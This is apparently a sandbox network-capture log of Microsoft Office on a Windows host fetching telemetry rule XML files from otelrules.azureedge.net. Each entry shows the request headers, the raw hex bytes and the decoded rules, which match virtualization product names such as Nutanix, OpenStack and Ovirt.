                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:40 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                              ETag: "0x8DC582B9C710B28"
                                                                                                                                                                              x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073040Z-1777c6cb7542p5p4hC1TEBq0980000000aqg00000000dqbv
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              62192.168.2.64977513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:40 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:40 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                              ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                              x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073040Z-1777c6cb7549x5qchC1TEBggbg0000000au000000000bdat
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:40 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              63192.168.2.64977613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:41 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:41 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                              ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                              x-ms-request-id: 7a62cedf-201e-003c-3dc3-3b30f9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073041Z-r1d97b99577kk29chC1TEBemmg0000000a1g00000000an8q
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              64192.168.2.64977713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:41 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:41 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                              x-ms-request-id: 83e3c789-401e-00a3-649b-3b8b09000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073041Z-r1d97b99577lxltfhC1TEByw2s0000000a60000000000tr3
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:41 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              65192.168.2.64977813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:41 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:41 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                              ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                              x-ms-request-id: be70f01e-301e-000c-538c-3a323f000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073041Z-r1d97b995774zjnrhC1TEBv1ww00000009wg00000000fkev
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              66192.168.2.64977913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:42 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:42 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                              ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                              x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073042Z-178bfbc474bw8bwphC1NYC38b400000000vg00000000hvyk
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              67192.168.2.64978013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:42 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:43 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                              ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                              x-ms-request-id: 853e1beb-101e-00a2-3cbf-3b9f2e000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073043Z-r1d97b99577ndm4rhC1TEBf0ps0000000a4000000000abru
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:43 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              68192.168.2.64978313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:43 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:44 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 470
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                              ETag: "0x8DC582BBB181F65"
                                                                                                                                                                              x-ms-request-id: 7df2b923-c01e-007a-2777-3bb877000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073044Z-1777c6cb754ww792hC1TEBzqu40000000amg0000000099ad
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:44 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              69192.168.2.64978113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:43 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:44 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 485
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                              ETag: "0x8DC582BB9769355"
                                                                                                                                                                              x-ms-request-id: f37cb76d-d01e-0017-2085-3ab035000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073044Z-r1d97b995778dpcthC1TEB4b5400000009yg000000006ew4
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:44 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              70192.168.2.64978213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:43 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:44 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                              ETag: "0x8DC582B989AF051"
                                                                                                                                                                              x-ms-request-id: 19a81fd9-501e-0078-66bc-3b06cf000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073044Z-r1d97b99577dd2gchC1TEBz5ys00000009ug00000000b34y
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:44 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


